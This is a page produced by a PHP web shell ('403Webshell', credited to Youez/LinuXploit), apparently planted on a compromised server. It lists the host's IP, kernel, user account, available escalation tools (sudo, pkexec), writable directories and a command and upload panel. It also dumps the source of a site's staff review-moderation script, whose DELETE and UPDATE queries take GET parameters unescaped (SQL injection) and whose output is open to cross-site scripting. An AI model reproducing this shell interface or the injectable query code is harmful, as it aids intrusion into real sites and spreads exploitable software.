403Webshell
Server IP : 51.89.169.208  /  Your IP : 18.216.230.65
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yellowleaf/public_html/spam_review.php
<?



include '../connect.php';

session_start();

include 'accesscontrol.php';  


if($_GET['del']=='yes'&&isset($_GET['id'])&&isset($_GET['em'])){

	$rev_email=$_GET['em'];

	$rev_id=$_GET['id'];

	$q1 = "DELETE FROM reviews WHERE rev_id='{$rev_id}' AND rev_email='{$rev_email}'";

	$r1 = mysql_query($q1) or die(mysql_error());

	$del_success=TRUE;	

}



if($_GET['keep']=='yes'&&isset($_GET['id'])&&isset($_GET['em'])){

	$rev_email=$_GET['em'];

	$rev_id=$_GET['id'];

	$q1 = "UPDATE reviews SET rev_confirm='1',rev_spam='0' WHERE rev_id='{$rev_id}' AND rev_email='{$rev_email}'";

	$r1 = mysql_query($q1) or die(mysql_error());

	$keep_success=TRUE;	

}

?>







<html>



<head>

<meta http-equiv="Content-Language" content="en-gb">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<link href="../style.css" rel="stylesheet" type="text/css">

<link href="style_staff.css" rel="stylesheet" type="text/css">

<title>Staff Area</title>

</head>



<body>

<?

include 'staff_header.php';



if($keep_success==TRUE){

	echo '<div align="center" class="successDvBx">The review has been updated and kept!</div>';

}

if($del_success==TRUE){

	echo '<div align="center" class="successDvBx" style="color:red;font-weight:bold;">THE REVIEW HAS BEEN DELETED!</div>';

}

?>

<div style="padding:20px;">

<table class="tblMain" border="1" bordercolor="#999999">

	<tr style="background-color:#111;color:#fff;font-weight:bold;">

		<td style="">Reviews</td>

		<td style="text-align:center;">KEEP</td>

		<td style="text-align:center;">DELETE</td>

	</tr>

	<?

	$a = mysql_query("SELECT * FROM reviews WHERE rev_spam='1'");

	while($b = mysql_fetch_array($a)){

	?>

	<tr>

		<td valign="top">

		<div style="font-size:16pt;color:#294576;"><?=$b['rev_name']?> - <span style="font-weight:bold;font-size:11pt;color:#555;"><?=date('d/m/Y',$b['rev_date'])?></span></div>

		<div style="margin-top:5px;font-size:11pt;"><?=htmlentities($b['rev_comment'])?></div>

		</td>

		<td valign="middle" style="text-align:center;" width="100">

			<a style="font-size:12pt;" href="spam_review.php?keep=yes&id=<?=$b['rev_id']?>&em=<?=$b['rev_email']?>" onclick="return confirm('Are you sure to KEEP?');" >keep</a>

		</td>

		<td valign="middle" style="text-align:center;" width="100">

			<a style="font-size:12pt;" href="spam_review.php?del=yes&id=<?=$b['rev_id']?>&em=<?=$b['rev_email']?>" onclick="return confirm('Are you sure to DELETE?');">delete</a>

		</td>

	</tr>

	<?}?>

</table>

</div>

</body>



</html>

Youez - 2016 - github.com/yon3zu
LinuXploit